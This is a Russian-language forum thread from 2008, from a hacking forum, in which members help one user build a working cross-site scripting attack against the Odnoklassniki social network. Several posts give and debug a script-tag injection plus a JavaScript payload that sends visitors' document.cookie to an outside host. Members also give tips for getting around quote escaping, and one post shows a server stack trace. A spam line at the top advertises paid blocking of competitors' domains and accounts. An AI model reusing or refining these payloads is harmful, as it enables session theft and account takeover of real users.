УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Итак наверно всем известно что на одноклассниках есть xss

Страница 4 из 4

Опции темы

Поиск в этой теме

Опции просмотра

#31

15.04.2008, 15:17

Scipio

Members of Antichat - Level 5

Регистрация: 02.11.2006

Сообщений: 781

Провел на форуме:
5939734

Репутация: 1917

Отправить сообщение для Scipio с помощью ICQ

Цитата:

Сообщение от andrey_a87

В поле имени стоит <script src="www.avlo.freevar.com/1.js"></script> в 1.js написано alert(/tets/);
не срабатывает =(( когда хочешь добавить сообщение когда должен срабатывать скрипт до появляется надпись добавить сообщение и усё...ни поля,ни фига....

я же тебе сказал:
1. нужно прописывать протокол http://
2. кавычки как я понимаю там экранируются, не используй их
3. http://www.avlo.freevar.com/1.js не существует и вобще на этот сайт ругается

Зарегай страничку на народе как я тебе сказал

__________________
Карфаген должен быть разрушен...

#32

15.04.2008, 15:43

andrey_a87

Участник форума

Регистрация: 02.03.2008

Сообщений: 111

Провел на форуме:
130720

Репутация: 6

зарегил на народе.... alvo150.narod.ru
index.html
______
<script src="http://www.alvo150.narod.ru/1.js"></script>

1.js
____
document.location='http://s.netsec.ru/andreya87.gif'+document.cookie';

Когда захожу на http://www.alvo150.narod.ru то не перекидывает меня на 1.js...

Просмотр исходного
<script src="http://www.alvo150.narod.ru/1.js"></script></textarea></form>
</title></comment></a>
</div></span></ilayer></layer></iframe></noframes></style></noscript></table></script></applet></font>
<style>
#bn {display:block;}
#bt {display:block;}
</style>
<div style="background:url(http://www.tns-counter.ru/V13a****yandex_ru/ru/CP1251/tmsec=narod_total/)"></div>
<script language="JavaScript" src="http://yabs.yandex.ru/show/163"></script>

#33

15.04.2008, 15:54

mister

Познающий

Регистрация: 24.07.2007

Сообщений: 31

Провел на форуме:
1417840

Репутация: 35

Отправить сообщение для mister с помощью ICQ

document.location='http://s.netsec.ru/andreya87.gif?'+document.cookie;

#34

15.04.2008, 16:05

andrey_a87

Участник форума

Регистрация: 02.03.2008

Сообщений: 111

Провел на форуме:
130720

Репутация: 6

ну да...но смысл не меняется не перходит он на этот скрипт....когда заходишь на http://www.alvo150.narod.ru

#35

15.04.2008, 17:14

Qwazar

Leaders of Antichat - Level 4

Регистрация: 02.06.2005

Сообщений: 1,411

Провел на форуме:
10605912

Репутация: 4693

Цитата:

Сообщение от andrey_a87

ну да...но смысл не меняется не перходит он на этот скрипт....когда заходишь на http://www.alvo150.narod.ru

Да потому что он у тебя кривой

У тебя там написано:

Код:

document.location='http://s.netsec.ru/andreya87.gif?'+document.cookie';

Убери апостроф после "document.cookie".

Сделай так:

Код:

document.location='http://s.netsec.ru/andreya87.gif?'+document.cookie;

З.Ы.
Да и вообще, лучше взять в привычку - перед тем как тестировать что либо удалённо, проверить скрипты на локальной тачке.

__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.

Последний раз редактировалось Qwazar; 15.04.2008 в 17:26..

#36

22.04.2008, 11:12

Светлый

Участник форума

Регистрация: 28.06.2007

Сообщений: 221

Провел на форуме:
836479

Репутация: 135

выдал такую ошибку :

Код:

500 Servlet Exception
one.ejb.control.client.ControllerFailureException: Can not obtain allowed
EJB service provider.
	at one.app.community.dk.model.AWebModel.get(AWebModel.java:536)
	at one.app.community.dk.model.AWebModel.handleEvent(AWebModel.java:464)
	at one.app.community.dk.model.AWebModel.performLogin(AWebModel.java:298)
	at one.app.community.dk.model.AWebModel.performLoginUser(AWebModel.java:286)
	at one.app.community.dk.servlet.DesktopServlet.handleNotLoginnedException(DesktopServlet.java:264)
	at one.app.community.dk.servlet.DesktopServlet.doPost(DesktopServlet.java:128)
	at one.app.community.dk.servlet.DesktopServlet.doGet(DesktopServlet.java:60)
	at javax.servlet.http.HttpServlet.service(HttpServlet.java:126)
	at javax.servlet.http.HttpServlet.service(HttpServlet.java:103)
	at com.caucho.server.http.FilterChainServlet.doFilter(FilterChainServlet.java:96)
	at one.app.community.filter.BufferingFilter.doFilter(BufferingFilter.java:85)
	at com.caucho.server.http.FilterChainFilter.doFilter(FilterChainFilter.java:88)
	at com.caucho.http.filter.GzipFilter.doFilter(GzipFilter.java:128)
	at com.caucho.server.http.FilterChainFilter.doFilter(FilterChainFilter.java:88)
	at com.caucho.server.http.Invocation.service(Invocation.java:315)
	at com.caucho.server.http.HttpRequest.handleRequest(HttpRequest.java:253)
	at com.caucho.server.http.HttpRequest.handleConnection(HttpRequest.java:170)
	at com.caucho.server.TcpConnection.run(TcpConnection.java:139)
	at java.lang.Thread.run(Thread.java:619)
Resin 2.1.16 (built Tue Feb 15 11:12:27 PST 2005)

без разрывов.
мб кому-то поможет

Последний раз редактировалось Светлый; 22.04.2008 в 11:17..

Страница 4 из 4

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Письма девочек-подростков в журнал "Yes!"	Lolik	Болталка	43	03.03.2009 22:43
Наша служба и опасна и трудна)	Copyright_2000	Болталка	10	28.05.2008 19:20
Сексуальные новости 2003 года	Рогатый Трупоед	Болталка	9	23.10.2007 00:24

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход